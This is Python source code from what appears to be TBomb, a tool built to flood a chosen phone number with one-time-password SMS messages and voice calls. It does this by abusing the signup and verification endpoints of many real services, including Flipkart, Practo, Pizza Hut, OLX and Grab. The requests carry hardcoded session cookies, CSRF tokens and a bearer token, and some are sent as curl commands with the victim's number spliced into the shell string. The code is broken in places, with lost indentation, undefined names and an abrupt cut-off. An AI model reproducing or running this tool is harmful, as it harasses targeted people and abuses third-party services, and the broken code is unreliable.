print('Type \'pip install -r requirements.txt\' to install all required packages')
exit()
colors=['\033[1;31m','\033[1;32m','\033[1;33m','\033[1;34m','\033[1;35m','\033[1;36m']
W='\033[0m'
# The Credit For This Code Goes To SpeedX And All Other Contributors Listed At https://github.com/TheSpeedX/TBomb
# If You Wanna Take Credits For This Code, Please Look Yourself Again
country_codes = {
'93': 'AF',
'355': 'AL',
'213': 'DZ',
'376': 'AD',
'244': 'AO',
'672': 'AQ',
'54': 'AR',
'374': 'AM',
'297': 'AW',
'61': 'AU',
'43': 'AT',
'994': 'AZ',
'973': 'BH',
'880': 'BD',
'375': 'BY',
'32': 'BE',
'501': 'BZ',
'229': 'BJ',
'975': 'BT',
'591': 'BO',
'387': 'BA',
'267': 'BW',
'55': 'BR',
'246': 'IO',
'673': 'BN',
'359': 'BG',
'226': 'BF',
'257': 'BI',
'855': 'KH',
'237': 'CM',
'238': 'CV',
'236': 'CF',
'235': 'TD',
'56': 'CL',
'86': 'CN',
'57': 'CO',
'269': 'KM',
'682': 'CK',
'506': 'CR',
'385': 'HR',
'53': 'CU',
'599': 'AN',
'357': 'CY',
'420': 'CZ',
'243': 'CD',
'45': 'DK',
'253': 'DJ',
'670': 'TL',
'593': 'EC',
'20': 'EG',
'503': 'SV',
'240': 'GQ',
'291': 'ER',
'372': 'EE',
'251': 'ET',
'500': 'FK',
'298': 'FO',
'679': 'FJ',
'358': 'FI',
'33': 'FR',
'689': 'PF',
'241': 'GA',
'220': 'GM',
'995': 'GE',
'49': 'DE',
'233': 'GH',
'350': 'GI',
'30': 'GR',
'299': 'GL',
'502': 'GT',
'224': 'GN',
'245': 'GW',
'592': 'GY',
'509': 'HT',
'504': 'HN',
'852': 'HK',
'36': 'HU',
'354': 'IS',
'91': 'IN',
'62': 'ID',
'98': 'IR',
'964': 'IQ',
'353': 'IE',
'972': 'IL',
'39': 'IT',
'225': 'CI',
'81': 'JP',
'962': 'JO',
'254': 'KE',
'686': 'KI',
'383': 'XK',
'965': 'KW',
'996': 'KG',
'856': 'LA',
'371': 'LV',
'961': 'LB',
'266': 'LS',
'231': 'LR',
'218': 'LY',
'423': 'LI',
'370': 'LT',
'352': 'LU',
'853': 'MO',
'389': 'MK',
'261': 'MG',
'265': 'MW',
'60': 'MY',
'960': 'MV',
'223': 'ML',
'356': 'MT',
'692': 'MH',
'222': 'MR',
'230': 'MU',
'262': 'RE',
'52': 'MX',
'691': 'FM',
'373': 'MD',
'377': 'MC',
'976': 'MN',
'382': 'ME',
'212': 'EH',
'258': 'MZ',
'95': 'MM',
'264': 'NA',
'674': 'NR',
'977': 'NP',
'31': 'NL',
'687': 'NC',
'64': 'NZ',
'505': 'NI',
'227': 'NE',
'234': 'NG',
'683': 'NU',
'850': 'KP',
'47': 'SJ',
'968': 'OM',
'92': 'PK',
'680': 'PW',
'970': 'PS',
'507': 'PA',
'675': 'PG',
'595': 'PY',
'51': 'PE',
'63': 'PH',
'48': 'PL',
'351': 'PT',
'974': 'QA',
'242': 'CG',
'40': 'RO',
'7': 'RU',
'250': 'RW',
'590': 'MF',
'290': 'SH',
'508': 'PM',
'685': 'WS',
'378': 'SM',
'239': 'ST',
'966': 'SA',
'221': 'SN',
'381': 'RS',
'248': 'SC',
'232': 'SL',
'65': 'SG',
'421': 'SK',
'386': 'SI',
'677': 'SB',
'252': 'SO',
'27': 'ZA',
'82': 'KR',
'211': 'SS',
'34': 'ES',
'94': 'LK',
'249': 'SD',
'597': 'SR',
'268': 'SZ',
'46': 'SE',
'41': 'CH',
'963': 'SY',
'886': 'TW',
'992': 'TJ',
'255': 'TZ',
'66': 'TH',
'228': 'TG',
'690': 'TK',
'676': 'TO',
'216': 'TN',
'90': 'TR',
'993': 'TM',
'688': 'TV',
'256': 'UG',
'380': 'UA',
'971': 'AE',
'44': 'GB',
'1': 'US',
'598': 'UY',
'998': 'UZ',
'678': 'VU',
'379': 'VA',
'58': 'VE',
'84': 'VN',
'681': 'WF',
'967': 'YE',
'260': 'ZM',
'263': 'ZW'
}
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def banner():
clr()
logo="""
████████ ██████ ██
▒▒▒██▒▒▒ ██▒▒▒██ ██
██ ██ ██ ████ ██ ██ ██
██ ██████▒ ██▒▒██ ███ ███ █████
██ ██▒▒▒██ ██ ██ ██▒█▒██ ██▒▒██
██ ██ ██ ██ ██ ██ ▒ ██ ██ ██
██ ██████▒ ▒████▒ ██ ██ █████▒
▒▒ ▒▒▒▒▒▒ ▒▒▒▒ ▒▒ ▒▒ ▒▒▒▒▒
"""
print(random.choice(colors)+logo+W)
print("\n")
count_inf = 0
def infinite(pn, dl, ch, max):
global count_inf
while True:
while os.path.exists('proc.xxx'):
time.sleep(0.5)
os.system('touch proc.xxx')
api = random.choice(ch)
try:
ret = getapi(pn, api, 91)
except Exception:
ret = False
if not ret:
while ch.count(api) > 0:
ch.remove(api)
continue
os.system('rm proc.xxx >/dev/null 2>&1')
count_inf += 1
# os.system('echo SpeedX >> count.xxx')
time.sleep(float(dl))
if (count_inf > maxlim):
exit()
def checkinternet():
res = False
try:
# requests.get('https://www.google.com', verify=True)
requests.get('https://www.google.com')
res = False
except Exception:
res = True
if res:
print("\n\n\tIt seems That Your Internet Speed is Slow or You Are Using Proxies...")
print('\t\tTBomb Will Stop Now...\n\n')
banner()
exit()
def getapi(pn,lim,cc):
cc=str(cc)
pn=str(pn)
lim = int(lim)
url = ["https://www.oyorooms.com/api/pwa/generateotp?country_code=%2B" +
str(cc) + "&nod=4&phone=" + pn, "https://direct.delhivery.com/delhiverydirect/order/generate-otp?phoneNo=" + pn, "https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=" + pn]
try:
if lim < len(url):
urllib.request.urlopen(str(url[lim]))
return True
except (urllib.error.HTTPError, urllib.error.URLError):
return False
if lim == 3:
headers = {
'Host': 'pharmeasy.in',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Referer': 'https://pharmeasy.in/',
'Content-Type': 'application/json',
'Content-Length': '30',
'Connection': 'keep-alive',
}
data = {"contactNumber":pn}
response = requests.post('https://pharmeasy.in/api/auth/requestOTP', headers=headers, json=data)
return response.status_code==200
elif lim == 4:
cookies = {
'_ga': 'GA1.2.1273460610.1561191565',
'_gid': 'GA1.2.172574299.1561191565',
'_gcl_au': '1.1.833556660.1561191566',
'_fbp': 'fb.1.1561191568709.1707722126',
'PHPSESSID': 'm5tap7nr75b2ehcn8ur261oq86',
}
headers={
'Host': 'www.heromotocorp.com',
'Connection': 'keep-alive',
'Content-Length': '126',
'Accept': '*/*',
'Origin': 'https://www.heromotocorp.com',
'X-Requested-With': 'XMLHttpRequest',
'Save-Data': 'on',
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': 'https://www.heromotocorp.com/en-in/xpulse200/',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
}
data = {
'mobile_no': pn,
'randome': 'ZZUC9WCCP3ltsd/JoqFe5HHe6WfNZfdQxqi9OZWvKis=',
'mobile_no_otp': '',
'csrf': '523bc3fa1857c4df95e4d24bbd36c61b'
}
response = requests.post('https://www.heromotocorp.com/en-in/xpulse200/ajax_data.php', headers=headers, cookies=cookies, data=data)
return response.status_code==200
elif lim == 5:
cookies = {
'Cookie:_ga': 'GA1.2.1483885314.1559157646',
'_fbp': 'fb.1.1559157647161.1989205138',
'TiPMix': '91.9909185226964',
'gcb_t_track': 'SEO - Google',
'gcb_t_keyword': '',
'gcb_t_l_url': 'https://www.google.com/',
'gcb_utm_medium': '',
'gcb_utm_campaign': '',
'ASP.NET_SessionId': 'ioqkek5lbgvldlq4i3cmijcs',
'web_app_landing_utm_source': '',
'web_app_landing_url': '/personal-loan',
'webapp_landing_referral_url': 'https://www.google.com/',
'ARRAffinity': '747e0c2664f5cb6179583963d834f4899eee9f6c8dcc773fc05ce45fa06b2417',
'_gid': 'GA1.2.969623705.1560660444',
'_gat': '1',
'current_url': 'https://indialends.com/personal-loan',
'cookies_plbt': '0',
}
headers = {
'Host': 'indialends.com',
'Connection': 'keep-alive',
'Content-Length': '75',
'Accept': '*/*',
'Origin': 'https://indialends.com',
'X-Requested-With': 'XMLHttpRequest',
'Save-Data': 'on',
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': 'https://indialends.com/personal-loan',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
}
data = {
'aeyder03teaeare': '1',
'ertysvfj74sje': cc,
'jfsdfu14hkgertd': pn,
'lj80gertdfg': '0'
}
response = requests.post('https://indialends.com/internal/a/mobile-verification_v2.ashx', headers=headers, cookies=cookies, data=data)
return True
elif lim == 6:
headers = {
'host': 'www.flipkart.com',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0',
'accept': '*/*',
'accept-language': 'en-US,en;q=0.5',
'accept-encoding': 'gzip, deflate, br',
'referer': 'https://www.flipkart.com/',
'x-user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 FKUA/website/41/website/Desktop',
'origin': 'https://www.flipkart.com',
'connection': 'keep-alive',
'Content-Type': 'application/json; charset=utf-8'}
data = {"loginId":["+"+cc+pn],"supportAllStates":true}
response = requests.post('https://www.flipkart.com/api/6/user/signup/status', headers=headers, json=data)
return True
elif lim == 7:
cookies = {
'Cookie:T': 'BR%3Acjvqzhglu1mzt95aydzhvwzq1.1558031092050',
'SWAB': 'build-44be9e47461a74d737914207bcbafc30',
'lux_uid': '155867904381892986',
'AMCVS_17EB401053DAF4840A490D4C%40AdobeOrg': '1',
'AMCV_17EB401053DAF4840A490D4C%40AdobeOrg': '-227196251%7CMCIDTS%7C18041%7CMCMID%7C63273353035509304576927719203948933246%7CMCAID%7CNONE%7CMCOPTOUT-1558686245s%7CNONE%7CMCAAMLH-1559283845%7C12%7CMCAAMB-1559283845%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI',
's_cc': 'true',
'SN': '2.VI8085A6A237EB4C62836C8809F0D312EB.SI21A9EC4E99B949B2ACE6361B3F0208CC.VS187649B2B06A44C69824006710CB6D83.1558679078',
'gpv_pn': 'HomePage',
'gpv_pn_t': 'Homepage',
'S': 'd1t17GQVqPz9KPzobP3M4GQkjPy34TjfJxI4SbXVIvhwzm3mE13vfSEulmf90D/7L710qUpMq8mA0k2bx6b2DuwIS4g==',
's_sq': '%5B%5BB%5D%5D'}
headers = {
'Host': 'www.flipkart.com',
'Connection': 'keep-alive',
'Content-Length': '60',
'X-user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 FKUA/website/41/website/Desktop',
'Origin': 'https://www.flipkart.com',
'Save-Data': 'on',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': '*/*',
'Referer': 'https://www.flipkart.com/',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
}
data = {
'loginId': '+'+cc+pn,
'state': 'VERIFIED',
'churnEmailRequest': 'false'
}
response = requests.post('https://www.flipkart.com/api/5/user/otp/generate', headers=headers, cookies=cookies, data=data)
return True
elif lim == 8:
headers = {
'Host': 'www.ref-r.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Content-Length': '26',
'DNT': '1',
'Connection': 'keep-alive',
}
data = {
'mobile': pn,
'submit': '1',
'undefined': ''
}
response = requests.post('https://www.ref-r.com/clients/lenskart/smsApi', headers=headers, data=data)
return True
elif lim == 9:
headers = {
'X-DROID-VERSION': '4.12.5',
'API-Version': '2.0',
'user-agent': 'samsung SM-G9350 0 4.4.2',
'client-version': 'Android-4.12.5',
'X-DROID-VERSION-CODE': '158',
'Accept': 'application/json',
'client-name': 'Practo Android App',
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'accounts.practo.com',
'Connection': 'Keep-Alive',
'Content-Length': '96'}
data = {
'client_name': 'Practo Android App',
'mobile': '+'+cc+pn,
'fingerprint': '',
'device_name':'samsung+SM-G9350'}
response = requests.post( "https://accounts.practo.com/send_otp", headers=headers, data=data)
rd=response.text
# rd = os.popen('curl -s -X POST -H "X-DROID-VERSION:4.12.5" -H "API-Version:2.0" -H "user-agent:samsung SM-G9350 0 4.4.2" -H "client-version:Android-4.12.5" -H "X-DROID-VERSION-CODE:158" -H "Accept:application/json" -H "client-name:Practo Android App" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:accounts.practo.com" -H "Connection:Keep-Alive" -H "Content-Length:96" -d "client_name=Practo+Android+App&fingerprint=&mobile=%2B' + cc + pn + '&device_name=samsung+SM-G9350&" "https://accounts.practo.com/send_otp"').read()
return rd.find("success") != -1
elif lim == 10:
headers = {
'Host': 'm.pizzahut.co.in',
'content-length': '114',
'origin': 'https://m.pizzahut.co.in',
'authorization': 'Bearer ZXlKaGJHY2lPaUpJVXpJMU5pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SmtZWFJoSWpwN0luUnZhMlZ1SWpvaWIzQXhiR0pyZEcxbGRYSTBNWEJyTlRGNWNqQjBkbUZsSWl3aVlYVjBhQ0k2SW1WNVNqQmxXRUZwVDJsS1MxWXhVV2xNUTBwb1lrZGphVTlwU2tsVmVra3hUbWxLT1M1bGVVcDFXVmN4YkdGWFVXbFBhVWt3VGtSbmFVeERTbmRqYld4MFdWaEtOVm96U25aa1dFSjZZVmRSYVU5cFNUVlBSMUY0VDBkUk5FMXBNV2xaVkZVMVRGUlJOVTVVWTNSUFYwMDFUV2t3ZWxwcVp6Vk5ha0V6V1ZSTk1GcHFXV2xNUTBwd1l6Tk5hVTlwU205a1NGSjNUMms0ZG1RelpETk1iVEZvWTI1U2NWbFhUbkpNYlU1MllsTTVhMXBZV214aVJ6bDNXbGhLYUdOSGEybE1RMHBvWkZkUmFVOXBTbTlrU0ZKM1QyazRkbVF6WkROTWJURm9ZMjVTY1ZsWFRuSk1iVTUyWWxNNWExcFlXbXhpUnpsM1dsaEthR05IYTJsTVEwcHNaVWhCYVU5cVJURk9WR3MxVG5wak1VMUVVWE5KYlRWcFdtbEpOazFVVlRGUFZHc3pUWHByZDA1SU1DNVRaM1p4UmxOZldtTTNaSE5pTVdSNGJWVkdkSEExYW5WMk9FNTVWekIyZDE5TVRuTkJNbWhGVkV0eklpd2lkWEJrWVhSbFpDSTZNVFUxT1RrM016a3dORFUxTnl3aWRYTmxja2xrSWpvaU1EQXdNREF3TURBdE1EQXdNQzB3TURBd0xUQXdNREF0TURBd01EQXdNREF3TURBd0lpd2laMlZ1WlhKaGRHVmtJam94TlRVNU9UY3pPVEEwTlRVM2ZTd2lhV0YwSWpveE5UVTVPVGN6T1RBMExDSmxlSEFpT2pFMU5qQTRNemM1TURSOS5CMGR1NFlEQVptTGNUM0ZHM0RpSnQxN3RzRGlJaVZkUFl4ZHIyVzltenk4',
'x-source-origin': 'PWAFW',
'content-type': 'application/json',
'accept': 'application/json, text/plain, */*',
'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
'save-data': 'on',
'languagecode': 'en',
'referer': 'https://m.pizzahut.co.in/login',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
'cookie': 'AKA_A2=A'}
data = {"customer":{"MobileNo":pn,"UserName":pn,"merchantId":"98d18d82-ba59-4957-9c92-3f89207a34f6"}}
response = requests.post('https://m.pizzahut.co.in/api/cart/send-otp?langCode=en', headers=headers, data=data)
return True
elif lim == 11:
headers = {
'host': 'www.goibibo.com',
'user-agent': 'Mozilla/5.0 (Windows NT 8.0; Win32; x32; rv:58.0) Gecko/20100101 Firefox/57.0',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'accept-language': 'en-US,en;q=0.5',
'accept-encoding': 'gzip, deflate, br',
'referer': 'https://www.goibibo.com/mobile/?sms=success',
'content-type': 'application/x-www-form-urlencoded',
'content-length': '14',
'connection': 'keep-alive',
'upgrade-insecure-requests': '1'}
data = {'mbl': pn}
response = requests.post('https://www.goibibo.com/common/downloadsms/', headers=headers, data=data)
return True
elif lim == 12:
headers = {
'Host': 'www.apollopharmacy.in',
'content-length': '17',
'accept': '*/*',
'origin': 'https://www.apollopharmacy.in',
'x-requested-with': 'XMLHttpRequest',
'save-data': 'on',
'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'referer': 'https://www.apollopharmacy.in/sociallogin/mobile/login/',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
'cookie': 'section_data_ids=%7B%22cart%22%3A1560239751%7D'}
data = {'mobile': pn}
response = requests.post('https://www.apollopharmacy.in/sociallogin/mobile/sendotp/', headers=headers, data=data)
rd=response.text
return rd.find("sent") != -1
elif lim == 13:
cookies = {
'Cookie:_ga': 'GA1.2.979928319.1560364071',
'_gid': 'GA1.2.666270216.1560364071',
'V': '201',
'_fbp': 'fb.1.1560364076913.1528349725',
'cto_lwid': 'd91bea3a-7610-45aa-8f78-65a0d740fb46',
'PushSubscriberStatus': 'DENIED',
'peclosed': 'true',
'G_ENABLED_IDPS': 'google',
'TS018cc593': '01ef61aed0fca110f50d8e3be2c66eb83188f6df8495c0ed2cd772829370fc12690954aad0834f545b57764467dbb66efb05d481a8958aebb273751956ef9eb383a3ba22dd1c94d82021e9d4c40011d4ab9bd97c6f0a74628ac12e8f7bcb663c1608e7288ebd252051cb84def3b021d3bcf643d3f3728ca9c0d9c780d171578ba966774f11ac44864a7f3da59791cb55f2741f23d72f7843efe9306459c00ec2e5f00065729a8573baba42384bb7cf46eb55cf89f72f1dcd5619a26e4ff32c63d06cac8c4bb158da6640bc0b11193134cbf38050ae0db230aa258b1181749fb0373afe041ad1aeffd0c08be7a62010db02cc65edfb1341d2de54cdf475c5dcd84e16c64c50',
'_gac_UA-68002030-1': '1.1560366197.Cj0KCQjwxYLoBRCxARIsAEf16-tx5UXrrP9SEhR8dPkTL4a9woEF7Ae-kvSlzKdgq35y31DeK3_uhg8aAkRBEALw_wcB',
'cdigiMrkt': 'utm_source%3A%7Cutm_medium%3A%7Cdevice%3Amobile%7Cexpires%3AFri%2C%2012%20Jul%202019%2019%3A03%3A17%20GMT%7C',
'ImpressionCookie': '4',
'ip': '10.1.10.1',
'sessionStatus': 'true|undefined',
'FirstPage': 'Thu Jun 13 2019 00:33:53 GMT+0530 (India Standard Time)',
'_dc_gtm_UA-68002030-1': '1',
'uI': 'johnyaho%40gmail.com',
'TS01fe4249': '01ef61aed09c32c6a53ce9e431a6a719c416867f2f3ad713fde2e74175bc248acc7a523f41e9751d032859a159bfff87664b90c3d0a9dfb2392f75876ccbe273b8a8e81d7a8d25047453c17a2905eca7eff26b780c'}
headers = {
'Host': 'www.ajio.com',
'Connection': 'keep-alive',
'Content-Length': '144',
'Accept': 'application/json',
'Origin': 'https://www.ajio.com',
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
'content-type': 'application/json',
'Referer': 'https://www.ajio.com/signup',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6'}
data = {"firstName":"SpeedX","login":"johnyaho@gmail.com","password":"Rock@5star","genderType":"Male","mobileNumber":"0000","requestType":"SENDOTP"}
response = requests.post('https://www.ajio.com/api/auth/signupSendOTP', headers=headers, cookies=cookies, json=data)
rd=response.text
if rd.find("\"statusCode\":\"1\"") != -1:
return True
else:
return False
elif lim == 14:
headers = {
'Host': 'api.cloud.altbalaji.com',
'Connection': 'keep-alive',
'Accept': 'application/json, text/plain, */*',
'Origin': 'https://lite.altbalaji.com',
'Save-Data': 'on',
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Mobile Safari/537.36',
'Content-Type': 'application/json;charset=UTF-8',
'Referer': 'https://lite.altbalaji.com/subscribe?progress=input',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
}
data = {"country_code":cc,"phone_number":pn}
response = requests.post('https://api.cloud.altbalaji.com/accounts/mobile/verify?domain=IN', headers=headers, json=data)
rd=response.text
return rd == '24f467b24087ff48c96321786d89c69f'
elif lim == 15:
cookies = {
'Cookie:frontend': 'a27mn3h3irt1rlt6i55s93p9r5',
'frontend_cid': '8zqBBzwQTMIt9UKg',
'_BEAMER_USER_ID_gADrycBn12870': 'c9fe4f7d-b421-4bad-9cf2-0a4db716dff4',
'G_ENABLED_IDPS': 'google',
}
headers = {
'Host': 'www.aala.com',
'Connection': 'keep-alive',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Origin': 'https://www.aala.com',
'X-Requested-With': 'XMLHttpRequest',
'Save-Data': 'on',
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': 'https://www.aala.com/',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6,ar;q=0.5',
}
data = {
'email': cc+pn,
'firstname': 'SpeedX',
'lastname': 'SpeedX'
}
response = requests.post('https://www.aala.com/accustomer/ajax/getOTP', headers=headers, cookies=cookies, json=data)
rd=response.text
return rd.find('code:') != -1
elif lim == 16:
data = {
'method': 'SMS',
'countryCode': 'id',
'phoneNumber': cc+pn,
'templateID': 'pax_android_production'
}
response = requests.post('https://api.grab.com/grabid/v1/phone/otp', data=data)
return True
elif lim == 100:
rd = os.popen('curl -s -X GET "https://www.makaan.com/apis/nc/sendOtpOnCall/16257065/' +
pn + '?callType=otpOnCall"').read()
return rd.lower().find("new otp has been") != -1
elif lim == 101:
rd = os.popen('curl -s -X POST -d mobile=%2B' + cc + '-' + pn +
' https://marketing.tllms.com/elearn/api/v4/authentications/phone_call').read()
return rd.lower().find("otp requests exceeded") == -1
elif lim == 102:
rd = os.popen('curl -s -X POST -H "Host:www.realestateindia.com" -H "content-length:58" -H "accept:text/html, */*; q=0.01" -H "origin:https://www.realestateindia.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.realestateindia.com/thanks.php?newreg" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_gat=1" -H "cookie:rei_mem_mobile_verify_status=0" -H "cookie:rei_mem_email_verify_status=N" -H "cookie:rei_mem_block_status=0" -H "cookie:rei_member_country=IN" -H "cookie:rei_paid_status=0" -H "cookie:rei_member_type=1" -H "cookie:rei_member_email=Fakemam%40ril.com" -H "cookie:rei_member_name=Fakeman" -H "cookie:rei_member_id=1547045" -H "cookie:cooki_sess_id=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:name=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:_gid=GA1.2.626525909.1560836369" -H "cookie:_ga=GA1.2.1033079331.1560836369" -H "cookie:visitedToken=176961560836367" -d \'action_id=call_to_otp&mob_num=' + pn + '&member_id=1547045\' "https://www.realestateindia.com/mobile-script/indian_mobile_verification_form.php?sid=0.5983221395805354"').read()
return rd.lower().find("y") != -1
elif lim == 103:
os.system(
'curl -s -X POST -H "Host:www.olx.in" -H "content-length:44" -H "accept:*/*" -H "x-newrelic-id:VQMGU1ZVDxABU1lbBgMDUlI=" -H "origin:https://www.olx.in" -H "user-agent:Mozilla/5.0 (Linux; Android 5.0.2; SH-04G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "referer:https://www.olx.in/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:onap=16b1b8f48d4x746d47ab-1-16b1b8f48d4x746d47ab-19-1559537345" -H "cookie:bm_sv=CDB97F50DA6615AC420F3E6E77B04E42~OoX2fAuP7ggcNa0VjzE95FzJNKRdJlW09Hja0/cysIGF1sJoBO7i0ndGXqnTWLaunlyxktHLbE8BSstPCRYn8VdP15lvUxK3ZY9ahXOSgwAidxwXd1jCe5wjIzYbiXp5eKNWfFpowhFbpxloe+SrbiE0YHJVPcCV5bmdsHgPfQc=" -H "cookie:AMP_TOKEN=%24NOT_FOUND" -H "cookie:hint=true" -H "cookie:_gid=GA1.2.369819276.1559535517" -H "cookie:_ga=GA1.2.665688753.1559535517" -H "cookie:ldTd=true" -H "cookie:G_ENABLED_IDPS=google" -H "cookie:HIDE_ONBOARDING_LOCATION=true" -H "cookie:testCookie=testCookie" -H "cookie:ak_bmsc=307C5311FB00A3F4E856AFFE1A9D000B0214BED9E0210000909FF45C1E802067~plFZfbMQGgEDr7OWVe9FvqfT24ZtOVMamtYcaip71IYOrv2+SQ6fokSvMk2Uesz5v1sFfaichbtDgeVSj3te3vXJKezSWgvoVWrK7gfzFrLz1ruBm0MQj01V5CmpaTr6tRgDRSN6bks3nqvOHzR0tA1IoqfDfq2MKtmDjbknCI5FlLYUTwqlnwHowYArfybn2n3yilE6VKHjW+tH8kqjAfH8BGuijpmO9pNkgmIyOeaZIVM3k6FGOL3Wj3jLI8uGaU" -H "cookie:_abck=153BD3D333948A58932748CAC3D4C3F40214BED9E0210000909FF45C18838E05~0~8O+udxdG38sBFTPZpaBL4IGj7eUcKJ1VwAtJ52GMO5E=~-1~-1" -H "cookie:bm_sz=BD665D919F7C6FA8374F196445596436~YAAQ2b4UArpOAwtrAQAAq0qPGwNksHBgphLwDzwfBlwIRQJAG7txmjBo/of7NiAJ93gy/7vBhQ9l5sIKdwtl2j+U4bys2Hhh5tZlZL/jqdnW/JrgmgawcxiunAJ32BbY9UtnFIrNxbbRvzQCYnSwf/cz9a7jURsui7leuLaVm7mQEcHPOtC6g5jrToAMTbdA" -H "cookie:97c09e2aabdfed89b87a3010d7f13c64=353b4f9fd82d26268ad11b2c1e9ae019" -H "cookie:lqstatus=1559536704" -H "cookie:laquesis=pan-26381@a#pan-27752@b#pan-30043@b#pana-26381@b" -d \'{"type":"call","descriptor":"+91' + pn + '"}\' "https://www.olx.in/api/challenges" >/dev/null 2>&1')
return True
elif lim == 104:
rd = os.popen('curl -s -X GET -H "Host:api.magicbricks.com" -H "Connection:keep-alive" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Safari/537.36" -H "Save-Data:on" -H "Accept:image/webp,image/apng,image/*,*/*;q=0.8" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" "https://api.magicbricks.com/bricks/verifyOnCall.html?mobile=' + pn + '"').read().decode('utf-8')
return rd.lower().strip().find('callmade') != -1
elif lim == 106:
rd = os.popen(
'curl -s "https://www.myupchar.com/user_profile/resend_otp_via_voice?id=' + pn + '"').read()
return rd.find("1") != -1
return False
def remsp(num):
num = num.replace(' ', '')
num = num.replace('-', '')
return num
def start(target, counter, delay, ch, cc):
clr()
banner()
failed = 0
requested = 0
success = int(requested) - int(failed)
bombs = int(counter) + 1
while success < (int(bombs)):
os.system('clear')
banner()
try:
api = random.choice(ch)
except Exception:
if cc == "91":
print('Sorry All APIs Have Expired Please Update TBomb')
input('Press Enter To Exit...')
exit()
else:
if success > 0:
print(
